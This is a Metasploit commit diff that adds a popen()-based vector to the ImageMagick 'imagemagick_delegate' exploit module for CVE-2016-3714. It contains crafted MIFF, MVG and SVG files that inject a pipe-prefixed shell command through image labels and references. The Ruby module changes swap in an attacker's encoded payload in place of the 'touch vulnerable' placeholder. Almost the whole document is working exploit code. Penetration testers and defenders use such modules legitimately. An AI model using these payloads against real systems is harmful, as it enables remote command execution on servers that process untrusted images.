Land #6922, add popen() additional vector to ImageMagick exploit (imagemagick_delegate)

data/exploits/imagemagick/popen/msf.miff

@@ -0,0 +1,14 @@
+id=ImageMagick  version=1.0
+class=DirectClass  colors=0  matte=False
+columns=1  rows=1  depth=16
+colorspace=sRGB
+page=1x1+0+0
+rendering-intent=Perceptual
+gamma=0.454545
+red-primary=0.64,0.33  green-primary=0.3,0.6  blue-primary=0.15,0.06
+white-point=0.3127,0.329
+date:create=2016-05-04T00:19:42-05:00
+date:modify=2016-05-04T00:19:42-05:00
+label={";touch vulnerable"}
+
+:ÿÿÿÿÿÿ

data/exploits/imagemagick/popen/msf.mvg

@@ -0,0 +1,8 @@
+push graphic-context
+encoding "UTF-8"
+viewbox 0 0 1 1
+affine 1 0 0 1 0 0
+push graphic-context
+image Over 0,0 1,1 '|touch vulnerable'
+pop graphic-context
+pop graphic-context

data/exploits/imagemagick/popen/msf.svg

@@ -0,0 +1,5 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve">  <image id="image0" width="1" height="1" x="0" y="0"
+    xlink:href="&#x7c;touch vulnerable" />
+</svg>

modules/exploits/unix/fileformat/imagemagick_delegate.rb

@@ -23,6 +23,9 @@ class MetasploitModule < Msf::Exploit
 
         Tested on Linux, BSD, and OS X. You'll want to choose your payload
         carefully due to portability concerns. Use cmd/unix/generic if need be.
+
+        If ImageMagick supports popen(), a |-prefixed command will be used for
+        the exploit. No delegates are involved in this exploitation.
       },
       'Author'          => [
         'stewie',            # Vulnerability discovery
@@ -35,7 +38,8 @@ class MetasploitModule < Msf::Exploit
         %w{URL https://imagetragick.com/},
         %w{URL http://seclists.org/oss-sec/2016/q2/205},
         %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},
-        %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456}
+        %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456},
+        %w{URL http://permalink.gmane.org/gmane.comp.security.oss.general/19669}
       ],
       'DisclosureDate'  => 'May 3 2016',
       'License'         => MSF_LICENSE,
@@ -64,7 +68,8 @@ class MetasploitModule < Msf::Exploit
     ))
 
     register_options([
-      OptString.new('FILENAME', [true, 'Output file', 'msf.png'])
+      OptString.new('FILENAME', [true, 'Output file', 'msf.png']),
+      OptBool.new('HAVE_POPEN', [false, 'popen() support', true])
     ])
   end
 
@@ -75,12 +80,18 @@ class MetasploitModule < Msf::Exploit
       p = payload.encoded
     end
 
-    file_create(template.sub('echo vulnerable', p))
+    if datastore['HAVE_POPEN']
+      file_create(template.sub('touch vulnerable', p))
+    else
+      file_create(template.sub('echo vulnerable', p))
+    end
   end
 
   def template
     File.read(File.join(
-      Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template]
+      Msf::Config.data_directory, 'exploits', 'imagemagick',
+      datastore['HAVE_POPEN'] ? 'popen' : 'delegate',
+      target[:template]
     ))
   end